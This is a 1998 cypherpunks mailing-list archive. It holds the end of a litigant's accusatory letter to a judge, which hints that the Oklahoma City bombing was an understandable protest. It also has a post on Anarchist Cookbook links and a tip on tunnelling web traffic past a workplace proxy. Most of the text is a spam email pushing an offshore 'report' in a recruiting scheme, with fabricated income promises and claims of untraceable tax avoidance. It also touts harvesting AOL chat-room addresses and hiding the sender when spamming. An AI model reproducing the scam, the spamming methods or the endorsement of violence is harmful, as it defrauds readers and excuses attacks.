     First Assistant U.S. Attorney  
 
RJG/maf 
 
http://www.jya.com/whprjg.htm 
 
as an indication that justice would not be forthcoming from the New Mexico District Attorney's Office. 
 
Therefore, I sought external relief. 
 
 First with Judge Fern Smith, District of Northern California  on March 11, 1996. 
 
Smith along with Albuquerque FBI agent-in-charge Thomas Knier sent FBI agents to our home to attempt to 
threaten me.  
 
Next I sought relief from  J. Clifford Wallace, chief judge,  Ninth Circuit Court of Appeals on  July 9, 1996. 
 
Wallace received a criminal complaint affidavit on Knier on July 15, 1996 for sending FBI agents in an 
attempt to threaten me. 
  
Ms. Corina Orozco,  Deputy Clerk., Ninth Circuit Court of Appeals wrote me 
 
             August 15, 1996 
 
             This court is in receipt of you letters dated July 15, 1996. 
 
             If you wish to file an appeal in this court and seek 
             judicial relief you must first file an action in the U.S. 
             District Court. 
 
NO, judge Hug, I was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
Gwen Baptiste from the Office of  the Clerk, United States Court of Appeals for The Ninth Circuit, 
wrote on July 25, 1996 
 
                  Re: Complaint of Judicial Misconduct 
 
             We have received your complaint of judicial misconduct. 
             Pursuant to the Rules of the Judicial Council of the Ninth 
             Circuit Governing Complaints of Judicial Misconduct or 
             Disability, you complaint is being returned to you for 
             compliance with the above rules.  A copy of these rules is 
             enclosed.  To understand the purpose of the procedure and 
             who may be complaint about please refer to Rules 1 and 2. 
 
AGAIN, judge Hug, I am filing CRIMINAL COMPLAINT AFFIDAVITS not COMPLAINTS OF JUDICIAL  
MISCONDUCT.   
 
Judge Hug, I hope it is FINALLY CLEAR that I am filing CRIMINAL COMPLAINT AFFIDAVITS as 
I am entitled to do by law. 
 
Judge Hug, THE DOCUMENTS YOU SHOULD HAVE IN YOUR POSSESSION and you can 
view on Internet at http://www.jya.com/snlhit.htm show 
 
1  Criminal violations of the Privacy Act http://www.jya.com/hr105-37.txt 
    ATTACHED 11 pages beginning with Sandia National Laboratories 
    director  Michael Robles writing EEOC Director Charles Burtner. 
 
    A  I never saw the documents until Sandia employee Richard Gallegos gave me a copy in 1997.  
    B  Sandia denied that the documents existed.   
    C  The documents contain factually incorrect information.  I did NOTHING WRONG.  I followed all        
         Sandia procedures known to me and obtained all required Sandia approvals.
    D  I was never given an opportunity to defend myself.  http://jya.com/greene.htm  
    E  Neither Sandia nor EEOC had my permission in writing for release  of the information.  
 
2  A ATTACHED PERJURED SWORN affidavit by Sandia attorney Gregory Cone submitted 
of the court of New Mexico judge John Conway. 
 
             AFFIDAVIT OF GREGORY A. CONE 
 
             Gregory A. Cone, being duly sworn, deposes and states: 
 
             1. I am employed by Sandia Corporation.  I am an attorney 
             admitted to practice law in the State of California and before the 
             U. S. Patent and Trademark Office and concentrate on legal issues 
             related to patent and copyright law.  In that capacity, I am  
             familiar with activities at the Sandia National Laboratories 
             ("Sandia") as they related to what is sometimes referred to as 
             "reverse engineering." ... 
 
              It is the general view at Sandia that disassembly of "object 
             code" under such circumstances constitutes a "fair use" of 
             copyrighted software under 17 U.S.C. article 107 and is thus 
             permissible.  Sandia bases its view on Sega Enterprises v. 
             Accolade, Inc. 977 F.2d 1510, 24 U.S.P. Q. 2d 1561 (9th Cir. 
             1992), amended, 1993 U. S. App. LEXIS 78, and Atari Games Corp 
             v. Nintendo of America, Inc, 975 F.2d 832 (Fed. Cir.  
             1992) ... 
 
             FURTHER, Affidavit sayeth naught. 
                                  
                                 (signed) 
                                GREGORY A. CONE. 
 
             SUBSCRIBED, SWORN TO and ACKNOWLEDGED before me on this 12th 
             day of August, 1993, by Gregory A. Cone." 
                                                 (signed) 
                                                Mary A. Resnick 
 
                                                Notary Public 
 
             My Commission Expires: 
 
             2-7-94 
 
Lawyer Cone has citations reversed.  The  U. S. Patent Quarterly references the Atari v Nintendo lawsuit.   
1510 should be corrected to 1015. 
 
Judge Fern Smith  ruled in both cases: 
 
                The first two cases to directly address the issue of 
                intermediate copying both originated in California's 
                Northern District Court.  They are Atari v. Nintendo and 
                Sega v. Accolade.  In both cases, the district court  
                found that intermediate copying was NOT fair use. ... 
  
                In a strong opinion she [Fern Smith] wrote in March 1991, 
                when granting Nintendo's request for a preliminary 
                injunction against Atari, she lambasted Atari's lawyers for 
                thievery.  ... 
 
                However, both cases have been overruled on appeal. In the 
                ground-breaking Atari decision, the Federal Circuit held 
                that intermediate copying was a fair use.  The Sega 
                decision, which was appealed to the Ninth Circuit Court of 
                Appeals, similarly overruled the district court and held 
                that intermediate copying may be fair use. 
 
        The New Use of Fair Use:  Accessing Copyrighted Programs Through  
        Reverse Engineering, Stephen B. Maebius, Journal of the Patent and  
        Trademark Office Society, June 1993, 75, n6, p433 
 
Cone's affidavit attempts to create the appearance that  reverse engineering  I REFUSED to do for the FBI was  
legal before July 27, 1992, the date of  my firing.  
 
Decision of the appeal was apparently Decided SEPTEMBER 10, 1992.  Page 1016 from 24 USPQ 2d, Atari  
Games Corp.  v. Nintendo of America.  I was fired JULY 27, 1992! 
 
Lawyer Cone has under oath knowingly made a false material declaration before a court.   
 
Judge Hug, we just can't get the arrest warrant issued for Cone YET.  Or for those who violated the criminal 
sections of the Privacy Act 
 
Judges and clerks who are apparently are reluctant to properly proceed against other federal or federal contract 
employee are themselves committing crimes. 
 
Judge Hug, there is ONE SET OF LAWS in the United States of America.  Not a set of laws which applies to 
ordinary citizens and another which apply to judges, clerks, federal and federal contract employees. 
 
Rule 3 of the Federal Rules of Criminal Procedure, entitled the Complaint provides: 
 
              The complaint is a written statement of the essential  
	facts constituting the offense charged.  It shall be made  
	upon oath before a magistrate. 
 
As you may be aware, 
 
             An individual may "make a written complaint on oath before  
	an examining and committing magistrate, and obtain a warrant  
	of arrest."  This is in conformity with the Federal  
	Constitution, and "consonant with the principles of natural  
	justice and personal liberty found in the common law." 
 
        [United States v Kilpatrick (1883, DC NC) 16G 765, 769] 
 
You may also be aware, 
 
            A complaint though quite general in terms is valid if it 
            sufficiently apprises the defendant of the nature of the 
            offense with which he is charged. 
 
        [United States v Wood (1927, DC Tex) 26F2d 908, 910, affd 
        (CA5 Tex) 26 F2d 912. 
 
And for your edification, 
 
        The commission of a crime must be shown by facts positively 
        stated.  The oath or affirmation required is of facts and 
        not opinions or conclusion. 
 
        [United States ex rel. King v Gokey (1929, DC NY) 32 F2d 
        793, 794] 
 
        The complaint must be accompanied by an oath. 
 
        [Re Rules of Court (1877, CC Ga) 3 Woods 502, F Cas No 
        12126] 
 
        A complaint must be sworn to before a commissioner or other 
        officer empowered to commit persons charged with offenses 
        against the United States. 
 
        [United States v Bierley ( 1971, WD Pa) 331 F Supp 1182] 
 
Such office is now called a magistrate. 
 
        A complaint is ordinarily made by an investigating officer 
        or agent, and where private citizens seek warrants of 
        arrest, the practice recommended by the Judicial Conference 
        of the United States is to refer the complaint to the United 
        States Attorney.  However, further reference to him is 
        rendered futile where a mandamus proceeding is brought to 
        compel him to prosecute and he opposes the proceeding. 
 
        [Pugach v Klein (1961, SD NY) 193 F Supp 630, citing Manual 
        for United States Commissioners 5 (1948)] 
 
Any attempt to bring criminal complaints to government authorities  
would, of course, be as evidenced by Gorrence's letter http://www.jya.com/whprjg.htm . 
 
I am a citizen of the United States and you are the assigned  
magistrate. 
 
        In order to satisfy the requirement of the Constitution  
        and Rules 3 and 4, a written and sworn complaint should set 
        forth the essential facts constituting the offense charged 
        and also facts showing that the offense was committed and 
        that the defendant committed it. 
 
And, 
 
        As to the requirement that the complaint be made on personal 
        knowledge of the complainant, it is enough for the issuance 
        of a warrant that a complainant shows it to be on the 
        knowledge of the complainant. 
 
        [Giordenello v United States (1958) 357 US 480, 2 L Ed. 2d 
        1503, 78 S Ct 1245, rev. (Ca5 Tx) 241 F2d 575, 579 in accord 
        Rice v Ames (1901) 180 US 371, 45 L Ed 577, 21 S ct 406, and 
        United States v Walker, (1952, CA2 NY) 197 F 2d 287, 289, 
        cert den 344 US 877, 97 L Ed 679, 73 S Ct 172] 
 
So as to keep contiguous the requirements of the law and the criminal  
complaint affidavits, I will include this complaint in this letter  
to you. 
 
CRIMINAL COMPLAINT AFFIDAVIT: Gwen Baptiste 
 
Essential material facts are: 
 
1 July 25, 1996 Gwen Baptiste improperly returns criminal complaint affidavits properly forwarded to  
Ninth Circuit judge J Clifford Wallace. 
 
2 May 5, 1998  Bapitist repeats return of criminal complaint affidavits properly sent to judge Proctor Hug  Jr. 
 
COUNT 1 
 
3  Ninth circuit Senior Case Expeditor Gwen Baptiste  is charged with REPEATED INTENTIONAL  
MACLIOUS Obstruction of Justice, 18 USC 1512, (b) and (c).  
 
Title 18 Obstruction of Justice, Article  1512, as amended, states 
 
             Tampering with a witness, victim, or an informant 
 
             (b) Whoever knowingly uses intimidation ...  
	     threatens, ... or engages in misleading conduct toward  
	     another person with intent to - 
 
             (3) hinder, delay or prevent the communication to a law 
             enforcement officer or judge of the United States of 
             information relating to the commission or possible 
             commission of a Federal offense ... 
 
             (c) Whoever intentionally harasses another person and  
	     thereby hinders, delays, prevents, or dissuades any  
	     person from -  
 
             (1) reporting to a law enforcement or judge of the United 
             States the commission or possible commission of a Federal 
             offense ... 
 
             or attempts to do so, shall be fined under this title or imprisoned ... 
				 
for Baptiste's TWO attempts to convince citizen Payne to file a judicial misconduct complaint 
when Payne was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
              VERIFICATION 
 
              Under penalty of perjury as provided by law, the  
	undersigned certifies pursuant to 28 USC section 1746  
	that material factual statements set forth in this  
	criminal complaint are true and correct, except as to  
	any matters therein stated to be information and belief  
	of such matters the undersigned certifies as aforesaid  
	that the undersigned verily believes the same to be true. 
 
 
 
 
             Date                     William H. Payne 
        			 13015 Calle de Sandias NE 
                                          Albuquerque, NM 87111 
                                          505-292-7037 
  
Judge Hug, many citizens are becoming disgusted with government misconduct.  Something must 
be done to correct this. 
 
One example is of government misconduct is how the Department of Justice handled the case of a citizen  
ACCUSED of a federal firearm violation. http://www.monumental.com/SkyWriter/WacoMuseum/ 
 
Displeasure with the way the government handled to bring the ACCUSED to justice led to an 
unfortunate display of dissatisfaction.  ARTICLES RELATED TO OKLAHOMA CITY BOMBING   
http://www.aci.net/kalliste/  
 
Tenth circuit court clerks and judges violated their own rules denying court wins to citizen Morales and 
myself.  Senator Orrin Hatch improperly processed a judicial misconduct complaint against New Mexico
judge John Conway. http://www.jya.com/whp071598.htm

These two acts mostly caused Morales and me AND OTHERS to reveal additional unfortunate decisions by
factions within the US government in the hope PROMPT SETTLEMENT will bring relief. 
http://www.aci.net/kalliste/speccoll.htm   http://caq.com/cryptogate  http://jya.com/whpfiles.htm   
 
We seeks changes within the law so as to avoid future citizen frustration of our government and legal system 
not working properly.   
 
And possible unacceptable, but understandable, future expressions of frustrations of government employees not  
obeying the law. 
 
WRITTEN EVIDENCE both in document copies and on Internet is so BLATANT that crimes have been  
committed. 
 
 I ask that you do you job and issue the warrants of arrest.  Or write me and tell me why you cannot. 
 
I ask that you respond within 30 days. 
 
No response is an invalid response.  As  accused felon former chief judge J Clifford Wallace may 
now know. 
 
Sincerely, 
 
 
 
William H. Payne 
13015 Calle de Sandias NE 
Albuquerque, NM 87111 
 
Distribution 
 
Antoin Scalia   http://www.jya.com/whpscalia.htm   Certified Return receipt requested 
http://www.senate.gov/committee/judiciary.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Meredith Balcom <mbalcom@awai.com>
Date: Fri, 7 Aug 1998 19:57:14 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: FUCKIN MONKEY BUMKIN FRICASEE
Message-ID: <01BDC256.51FDB780.mbalcom@awai.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 9 Aug 1998 16:22:51 -0700 (PDT)
To: XoVoX123@aol.com
Subject: Re: Please help
In-Reply-To: <5257d040.35ce1c8e@aol.com>
Message-ID: <Pine.BSF.3.91.980807224006.1664B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



http://www.tardis.ed.ac.uk/~philip/meats-is-meats.html

http://www.nfinity.com/~anarky/text/jr_ckbk3.txt

The Anarchist Cookbook, by William Powell, is a 160 page book, originally 
published in 1971 by Lyle Stuart. It is currently published by
Barricade Books under ISBN 0-9623032-0-8. The "true/original" Anarchist 
Cookbook is generally not available on-line, although there are plenty of 
knock offs. BTW- the Anarchist Cookbook is full of errors and outright 
bullshit, and if you try to make explosives by following its instructions 
you will probably end up known as "lefty."  For example, the book 
explains how to make the drug "bananadine", although there is no such 
drug; the "banandine" rumor was started as a joke at Berkely back in the 
late '60's, and it appears that Powell must have taken it seriously. 
Consider the chemistry to be equally suspect.

Ordnancemarsupial



On Sun, 9 Aug 1998 XoVoX123@aol.com wrote:

> Could you please send me the Anarchy Cookbook.....
> I really want it and I cant find it anywhere!
> Thanx for your help.. Mike Jonhson
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wayne clerke <clerke@emirates.net.ae>
Date: Fri, 7 Aug 1998 12:04:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: Is there a freeware knockoff of SSH for win95
In-Reply-To: <199808070521.HAA17085@replay.com>
Message-ID: <002901bdc236$1c6956d0$86a9aac2@strange>
MIME-Version: 1.0
Content-Type: text/plain


I'm using the ssh32 client (updated last month) by Cedomir Igaly
(c.igaly@doc.ic.ac.uk) under win NT4 and forwarding the http  (and mail and
news) packets. It's working like a charm.

There's a recent 16bit version as well. http://www.doc.ic.ac.uk/~ci2/ssh/

regards,
Mail: <a href= mailto:clerke@emirates.net.ae >Wayne Clerke</a>
PGP key id: AEB2546D  F/P: D663D11EDA19D74F5032DC7EE001B702
PGP key id: 57AA1C10  F/P: 9926BF8918B7EB3623A7 AFA46572C5B857AA1C10
PGP mail welcome.			Voice: +971 506 43 4853
If you're not living on the edge, you're taking up too much space.

> -----Original Message-----
> From: owner-cypherpunks@Algebra.COM
> [mailto:owner-cypherpunks@Algebra.COM]On Behalf Of Anonymous
> Sent: Friday, August 07, 1998 09:22
> To: cypherpunks@toad.com
> Subject: Is there a freeware knockoff of SSH for win95
>
>
>
> I'm looking for something to encrypt all of my web browsing while I am
> at work.  My work keeps a couple gigs devoted to a cache file in the
> proxy and I want to find a cheap way around that for my work.
> Personally paying for Fsecure SSH is not worth it just for work.
> I would be wiiling to pay for an account at cyberpass.net for their
> ssh server but the software is way too much.
>
>
> _________________________________________________________
> DO YOU YAHOO!?
> Get your free @yahoo.com address at http://mail.yahoo.com
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Friend@greatbiz.net
Date: Fri, 7 Aug 1998 22:14:20 -0700 (PDT)
To: Friend@greatbiz.net
Subject: " COMPLETE HOME BUSINESS KIT!!"
Message-ID: <199808080511.AAA20576@www.telecommex.com>
MIME-Version: 1.0
Content-Type: text/plain


EARN OVER $70,000 A MONTH
IN YOUR OWN HOME BASED BUSINESS 
AND LEGALLY PAY VERY LITTLE TAXES!!

This is NOT, I repeat, This is not MLM or Chainletter junk!!!

Friend;

     Those are strong words, I know. But if you're not making at least a TENTH of this every month you need to pay attention because I have an IMPORTANT MESSAGE on how you can make what I'm earning and do it within the next 90 days!!

     For years I have spun my wheels in various Home Based Business Opportunities with little success. A few MONTHS ago I finally found the key to making bundles of money, right from my home, selling a product everyone in the world needs and wants... INFORMATION! 
	
	I'm going to help you do the same if you JUST listen to learn how 
	to make over $70,000 a month with one of Hottest Selling reports
	in the world today!

 1)	I will set you up in your own Home Based Business for only $50.00!

 2)	I will GIVE you one of the FASTEST selling products in the world you can
      reproduce YOURSELF for pennies!
 
 3)	I will show you how you can become a Self Publisher & sell one of the most 
      Powerful & Provocative Reports ever written - right from your own home!

 4)	I will let you keep ALL the money you make selling this product!

   
   You don't need to spend thousands of dollars, bear enormous risk and work hundreds of hours a week to start this legitimate business from your home. 
     
   In a matter of hours you can start working at HOME, from your KITCHEN TABLE, making from $50 to $1,000 a day!!

	Here is all you will need...

#1. The Hottest Selling Publication In The World Today Called Offshore Special 
      Report Number 5599.
#2. A Copy Machine Or A Quick Copy Service That Can Duplicate OFS's Offshore 
     Special Report.
#3. A Quality Mailing List Or A Local Or National Publication to Run A SIMPLE Four 
     Line Classified Ad!
#4. A Mail Box To Collect The Hundreds Of Orders You Will Be Receiving Everyday - 
     Six Days A Week!
#5  This letter, which you obviously already have, just save it..  	
______________________________________________________________________
The Key To Any Business Success Is To Have A Product Or Service Everyone In The World Needs And Wants. That Product Should Be Inexpensive To Produce & Easy To Ship. You Will Have That Product With OFS's Offshore Special Report Number 5599!!
______________________________________________________________________

   OFS's Offshore Special Report Number 5599 will change peoples lives throughout the world by showing them how they can make and save money by removing themselves from the strict rules, regulations and tax burdens their government has imposed on them in the last few years.    

   BRACE YOURSELF - most people are taken aback by what I am about to tell you regarding OFS's Offshore Special Report Number 5599.

In OFS's Offshore Special Report Number 5599 You will find out that...

UNFAIR & DISCRIMINATORY Divorce settlements are made obsolete in this report!
RUTHLESS Creditors will CRINGE if they know you have read this report!
BLOOD SUCKING Lawyers May Go Broke By You Reading This Report!
HEARTLESS Tax agencies see RED when they read this report!
SNEAKY Politicians use the information in this report everyday!
Your GREEDY banker does not want you to read this report!
This report is BLACKBALLED by Most Government Agencies!
BACK STABBING relatives HATE this report!

You will also learn & Or Have Access To...

Ways POLITICIANS & THE RICH get even richer using TRUSTS and HOW you can do the same!

Incorporate offshore - Completely private and away from your government's regulations!

Your own secret offshore mailing address - no one will know your real address.

Offshore private checking account - deposit money and pay your bills from offshore - no paper trails.

Save up to 50% on printing & mail & have your sales material mailed from Jamaica - Are you in the mail order business? Here's a money saving opportunity no one else can offer!

Offshore investors - Do you have a viable funding project?

Offshore tax havens - legally delay or eliminate taxes  - no one knows - not even your government!

Offshore IBC's & Trusts - Asset protection from creditors and your government!    

Offshore Phone answering service - more privacy - more protection!    

Offshore Self-liquidating loans - if structured right, never needs to be paid back!    

High yield offshore investment opportunities - Find out how the rich make from 1% to 4% a week on their money - offshore and tax free - you can do the same!
    
Offshore visa card regardless of credit - no paper trails - works in any  ATM  worldwide!
       
Up to 100% financing on residential and commercial property - Hard to place mortgage sources!    
       
Bill consolidation regardless of credit rating - stop those harassing creditors within days using this credit source!
    
Lines of credit up to $15,000 regardless of credit - these credit cards are major bankcards!
    
Secret money - secrecy is a thriving industry - you will have access to these secret money sources!    
______________________________________________________________________
With All This Valuable Information In Report number 5599,  Do You See Why It's The Hottest Selling Report In The World Today? This Information Is Not Accessible Just Anywhere! Information Like This Can Not Be Found At Your Local Library. It Is Well Worth $50.00 - In Fact Its Well Worth Thousands Of Dollars By Showing People How They Can Save A Hundred Times That Amount In Taxes Alone! The Best Deal Of All Is That You Will Have FULL REPRINTS RIGHTS  And The Permission To Sell OFS's Offshore special Report Number 5599. YOU Keep ALL The Money!
______________________________________________________________________

   Information is the perfect product. It's easy to reproduce, easy to ship and easy to sell especially when it's as powerful as Report #5599. The market is unlimited in that you can sell Report #5599 to anyone, anyplace in the world. The potential is unlimited because there are billions of people throughout the world who need Report #5599 and are being introduced to Report #5599 this minute. Everyone...I mean everyone needs Report #5599....

   People who have a J.O.B. and have "More Month Than Money" - You know "Just over broke" !!
    
   People who are self-employed - paying that "Self Employment Tax" and are prime candidates for Law suits from every direction!
    
    People who are sick and tired of frivolous law suits - Did you know that in the U.S. there are 2.67 lawyers for every 1,000 people? Most lawyers are HUNGRY and need to sue someone for any reason to survive! 
   
    Professional people such as doctors, engineers, technicians, architects, stock- brokers, accountants,and YES even lawyers! - You know those people in the HIGHER THAN AVERAGE tax brakets! 
   
    People who are getting married or are married and plan on living happily ever after - Now back to reality - the U.S. has a divorce rate that exceeds 60% every year!    
    	
   Partners who want to make sure their partnership is a true 50-50 deal now and in the future!
    	
   People who live in a country that has strict rules and regulations limiting where and how they can run their business and manage their money!
    
   People who are retired and at the MERCY of their governments' rules concerning Social Security Income and Medical Benefits!
    
   People who WANT to retire but cannot afford to because of lack of income or the rules forced upon them by their government restricting them from receiving a decent income!
    
   People who are HIGH audit risks or have been audited by their governments' Dictatorial Tax Agency - You know "Guilty Until Proven Innocent"!  
  
   People who are paying their government 40% to 60% in taxes and are sick and tired of doing so! 
   
   People who are close to Bankruptcy and need to find a solution as soon as possible - 20% to 40% of the people in the United States are a paycheck away from Bankruptcy - Yes those people!  
  
   People who want to make sure their children receive 100% of their inheritance without the government stealing it away!   
 
   People who need credit and have been turned down through traditional sources, such as their local FRIENDLY bank! 
   
   People who want to keep their business and personal affairs PRIVATE-Hard to do this day and age with all the computers!  
  
   People who have the dream of financial independence and want to make thousands a day running their own Home Based Business!
    
    You must agree with me there is a tremendous market throughout the world; of people who are breathing and paying taxes which are prime candidates for Report #5599!
____________________________________________________________________
    Since We Have Determined The Entire World Is A Prime Candidate For Report #5599 Let Me Show You How Easy It Is To Sell Report# 5599 working From Your Kitchen Table!    ______________________________________________________________________

   HOLD ON!! How Rude Of Me! I Have Been Talking To You From The beginning of this email, without Officially Introducing Myself!  So let me officially introduce myself - I'm one of several OFS Independent Associates making FIVE DIGITS every month!  I'll be your sponsor - I'm the person who you will pay the $50.00 to and receive Report# 5599! I'm the person who will change your life forever! I'm the person who wants to see you succeed because if you succeed - I succeed!

   I want to make sure YOU succeed and see YOU sell hundreds, even thousands of reports every week. 
	
   The more you sell the more money I can make! Its' TRUE that you keep ALL of the $50.00 when you sell a report. You pay me NOTHING other than the initial $50.00 for the report - Not one single dollar - you keep it all. Sell only 10 reports a week and make $500 - You keep it all! Sell 100 Reports a week and you make $5,000 - You keep it all! Sell 500 Reports a week and make $25,000 - YOU KEEP IT ALL!!!

   Before I tell you how and why I make money every time you sell a report, let me show you how easy it is to advertise and sell "The Hottest Selling Report In the World" - OFS's Offshore Special Report Number 5599!.

   This report has been designed to be self-contained with all the marketing concepts on how to sell the report RIGHT INSIDE. In your copy of Report# 5599 you will have access to the following marketing strategies and tools...

   Sample of proven classified ads you can place in local or national publications that will make you FILTHY RICH!
     	
   A POWERFUL photo ready copy of a postcard you can put YOUR name & address on and have the $50.00 sent directly to you - AUTOMATICALLY.  I will show you how you can Print and Mail that Postcard - FIRST CLASS - for as little as Twelve Cents (U.S) Each!

Once you send in your Certificate of Registration from Report#5599 you will also receive...

     Additional DYNAMITE Classified and Display Ads that will generate hundreds, even thousands, of responses guaranteed to fill your mail box with $50.00 orders!

     Places to advertise for as little as seven cents (U.S.) Per word reaching over 73,000,000 People! A co-op advertising program sharing the leads and sales generated from National Television Infomercials!
     
A Photo Ready Copy of This ORDER PULLING Sales Letter for YOUR use to mail to the respondents of your ads!
     
Duplicatable Copy of an Audio Cassette Tape of this ORDER PULLING Sales Letter!
______________________________________________________________________
Become An Offshore Broker And Make More Money Than Most Dream Of Helping Others Find And Save Money! OFS's Offshore Special Report Number 5599 has a variety of money making opportunities and the "Offshore Broker" is just one of them!     
______________________________________________________________________

     I'M NOT GREEDY - I JUST LOVE WHAT MONEY      
     DOES FOR ME & MY FAMILY!     

   As the person who introduced YOU to Report# 5599 I have the opportunity to make over-rides on every Report# 5599 you sell. You see, I'm not happy JUST making $50.00 on the report I sold you. I would like to retire in the near future, sit back and receive hundreds, even thousands, of dollars a week for my past efforts of selling Report# 5599. In Report# 5599 there are additional money-making opportunities by having people establishing what are called International Business Corporations, Asset Protection Trusts(among other Offshore Business Support Services) and I can receive commissions and over-rides having people buying these services whether I personally sell them myself or you sell them through the initial sale of Report# 5599. That's why I'm interested in YOUR success. 

I want you to become a MILLIONAIRE by selling thousands of reports.

Here are a few of the additional money making opportunities contained in Report# 5599 from which I can make over-rides by becoming an "Offshore Broker"...

=> 	First, I make $50.00 on Report# 5599(I initally sold to you) in addition...
=> 	I can make up to $100 helping people set up an offshore checking account!
=> 	I can make up to $240 for every international business corporation established!
=> 	I can make up to $1,000 for every trust set up - Domestic or offshore!
=> 	I can make up to $50 for every self-liquidating loan manual sold!
=> 	I can make up to $100 for every offshore print & mail order!
=> 	I can make up to $100 for every offshore visa card established!
=> 	I can make up to $100 for everyone who receives a $15,000 Unsecured Line of 
      credit through a Major Bank Credit Card!
=> 	If I feel really energetic I can set up and run a TRUST AGENCY in my area and
      have people sell TRUSTS for me (somewhat like an Insurance  Agency)!  The
      money-making potential is tremendous by hiring several people who work in my 
      area. 

     I'm your sponsor and because of my efforts in selling YOU Report# 5599, I have the opportunity to make Lifetime Residuals from your efforts in selling Report# 5599 to others! I'm truly amazed at the marketing concept offered through OFS's Offshore Special Report Number 5599. The concept is so simple and it is COMPLETELY DUPLICATABLE! By making sure YOU MAKE thousands of dollars a week I'm going to get FILTHY STINKING RICH off your success!

     If it seems like I am BRAGGING and RUBBING it in about how I'm going to make bundles of money from your efforts it's TRUE!! You should be as EXCITED as I am because Report# 5599 allows YOU to DUPLICATE MY EFFORTS! When you sell a report to others you will then be in my position - to make ALL the over-rides and commissions I have just talked about - on those who then sell Report# 5599!
______________________________________________________________________
    The Following Questions & Answers are designed to answer most of the concerns you may have. This should give you enough information to determine if OFS's Offshore Special Report# 5599 is your tool for making thousands of dollars a week in a home based business...    
______________________________________________________________________

Q. Do I have to personally sell the report & the other offshore business support services to people who respond to my ads?

A. NO! This is really a two fold question. Let's talk about the selling of Report# 5599 first. All you have to do is place an ad, mail the postcards or send bulk email. If you place an ad send the respondent THIS SALES LETTER and let THIS SALES LETTER do the rest for you - no need to talk to anyone!! If you mail the postcards or use bulk emailing your job is done!

    The postcard will ask the respondent to send $50.00 to your mailing address. Email will work for you if you send it to as many people as you can. 

     If you decide to become an Offshore Broker and qualify to receive over-rides and commission on the Offshore Business Support Services the PARENT COMPANY will do the selling for you if you wish. This is a "NO BRAINER" and can be as simple or as complicated as you want to make it... Talk to the people if you wish or don't - Report# 5599 sells itself!

Q. How many hours a week will I have to devote to my business?

A. One to sixty hours a week! Here's a question I will answer with a question...How much money do you want to make? Common sense says the more ads you run and the more mailings you do the more money you will make! The statistics show that for every 100 responses you receive from your ads, and you mail THIS SALES LETTER, you will sell five to ten reports making you $250.00 to $500.00 (US). Your ad responses will vary depending on the place you advertise and the circulation of the publication. The more ads you run or the more emails you send out the more time you will need to devote to your Home Based Business.

Q. Just how much money will I need to start my home based business?

A. $50.00! Yeah I know - You're thinking you will need money for ads and mailing. Well - I've had people start with $50.00 (U.S) and make ten copies of the report and sold them to their associates and friends giving them $500.00(US). That gave them enough money to start running ads and to buy stamps. In looking at all the money making opportunities offered in the world today I really don't think you can get started for any less than $50.00 and have a BETTER LEGITIMATE money-making opportunity than the one offered in Report# 5599!     

Q. If I have additional questions who will answer them for me?

A. I will or the parent company will! No package of information, no matter how complete, can possibly answer every question that may come up. I do not want you to lose money seeking out the answers. I want you to succeed! You will receive a phone number in Report# 5599 where you can either reach me or someone from the parent company for any question or help you need!
______________________________________________________________________
    Here's a valuable bonus for ordering within 5 days....Your's absolutely FREE!! 
______________________________________________________________________ 

     I have persuaded the parent company - Offshore Financial Services, Ltd. - to give you their OFS Offshore Business Journal - Volume I - FREE OF CHARGE - as a bonus for ordering Report# 5599 within 5 days of receiving this email. You will receive the Journal when you send in your "Certificate of Registration" found in the report. The information in this Journal is priceless and can NOT be found anywhere but RIGHT HERE!!

Here's a sample of that information:

   Bonus #1 OFS's Offshore Business Journal

>Your IRS returns are suppose to be private - Not so!
> Funds through on-line computer services!
> Raising capital without borrowing from the bank!
> How to get medicines before they're approved by the FDA!
> Airlines will handle your baggage with special care if you know the secret!
> You can borrow money from your IRA. Just don't call it a loan
> How to get free subscriptions to over 60 magazines!
> Establish AAA credit in 30 days!
> Why Americans are mad as hell!
> Sources for quick cash loans.

    Bonus #2 Report #5599 Support Package.

> How to reach over 73,000,000 people for as little as 7 cents per word!
> How to set up voice mail and never talk to anyone who responds to your ads.
> To use or not to use a mailing list?
> How to receive free names to mail to.
> How to mail your postcards & sales flyers "First Class" for a low as 12 cents each-
   includes printing! 
> How to collect $5 from people who want to receive this sales letter!

    Bonus #3 Bulk-Emailer's Dream Package.
    
         By ordering within the next 5 days, you will also receive a floppy disk 
     packed full of online marketing tips from two of the nation's top electronic
     marketers. I have previously offered this disk for $79.95, but by purchasing 
     Report #5599 through this special offer within the next 5 days, it will be 
     yours for FREE!! I will also include another floppy disk with over 150 Hot Money
     Making reports that you can sell together or individually!
         Bulk-email has been proven to be the most effective way to market on the
     internet. By ordering within the next 5 days; I will include a program that collects
     names from aol chat rooms at a maximum rate of over 10,000 per Hour!! You will
     receive high response rates marketing to these fresh names that you have
     collected yourself.  Now all you will need is a bulk-email program, you will 
     receive a link where you can download a free fully working demonstration bulk-
     email program that will allow you to begin earning profits the day you receive my
     package.  You will not need to be concerned with losing your ISP because I will
     show you exactly how to send hundreds of thousands of emails per day while
     cloaking your ISP's mail server and your identity at the same time!!
        STOP THE PRESSES!!, I'm not finished giving away Free Extras yet! I have
     just learned of a Brand New ISP that is offering FREE ACCESS!!! That's right
     TOTALLY FREE unlimited internet access!! If your Order is received via Fax 
     within the next 24HRS I will tell you how to sign up for this free service which 
      is a $240/yr value ORDER NOW!!
        With all that I will be providing you, your success is guaranteed. You will not
     receive this offer again; by ordering Report #5599 within the next 5 days all of the
     above information will be yours for a measly US$50.00. ORDER TODAY!!
        Why am I giving away so much for so little? Good question... It is my personal
     belief that any responsible hardworking person can achieve financial security
     given the proper opportunity and information.. The Rich have kept opportunities
     and information to themselves that would allow anyone of us to achieve 
     unparalleled success easily.  That is why I am giving away a solid product, plus 
     all the information needed to successfully sell that product, for only US$50.00 
     to anyone with enough interest and patience to read this letter.


Sincerely,

YOUR SPONSOR
OFS Independent Associate

                                        RISK FREE GUARANTEE

